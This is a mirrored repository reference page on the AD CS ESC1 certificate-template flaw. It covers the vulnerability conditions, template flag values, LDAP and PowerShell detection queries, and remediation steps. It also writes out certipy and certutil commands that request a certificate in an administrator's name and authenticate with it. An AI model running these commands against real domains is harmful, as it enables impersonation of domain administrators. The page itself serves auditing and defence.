mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-12 14:14:56 +03:00
c21af3347e
- Add scripts/agent.py and references/api-reference.md to all remaining skills - Update all 648 LICENSE files: copyright now reads 'Mahipal' - Add implementing-security-monitoring-with-datadog (new skill with full anatomy) - All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md
2.1 KiB
2.1 KiB
API Reference: AD CS ESC1 Vulnerability
ESC1 — Enrollee Supplies Subject Alternative Name
Vulnerability Conditions
- Template allows enrollee to supply SAN (
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) - Template has Client Authentication EKU (OID 1.3.6.1.5.5.7.3.2)
- Low-privileged users (Domain Users) can enroll
- No manager approval required
Certipy — AD CS Auditing Tool
Find Vulnerable Templates
certipy find -u user@domain.local -p password -dc-ip 10.10.10.1 -vulnerable
Request Certificate with SAN (ESC1)
certipy req -u user@domain.local -p password -dc-ip 10.10.10.1 \
-ca CORP-CA -template VulnerableTemplate \
-upn administrator@domain.local
Authenticate with Certificate
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
certutil — Windows Built-in
List Templates
certutil -v -template
certutil -catemplates
certutil -TCAInfo
Request Certificate
certutil -submit -attrib "SAN:upn=admin@domain.local" request.req
Certificate Template Flags
msPKI-Certificate-Name-Flag
| Value | Name | Risk |
|---|---|---|
| 0x00000001 | CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT | CRITICAL |
| 0x00010000 | CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT_ALT_NAME | CRITICAL |
msPKI-Enrollment-Flag
| Value | Name |
|---|---|
| 0x00000002 | CT_FLAG_PEND_ALL_REQUESTS (manager approval) |
| 0x00000020 | CT_FLAG_AUTO_ENROLLMENT |
LDAP Queries for AD CS
Find templates with ENROLLEE_SUPPLIES_SUBJECT
(&(objectClass=pKICertificateTemplate)
(msPKI-Certificate-Name-Flag:1.2.840.113556.1.4.804:=1))
Find CAs
(objectClass=pKIEnrollmentService)
PowerShell — PSPKI Module
Install
Install-Module -Name PSPKI
Get Templates
Get-CertificateTemplate | Where-Object {
$_.Flags -band 1 # ENROLLEE_SUPPLIES_SUBJECT
} | Select-Object Name, Flags, OID
Remediation
- Remove
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECTfrom template flags - Require CA manager approval for certificate issuance
- Restrict enrollment permissions to specific security groups
- Enable certificate auditing (Event ID 4887)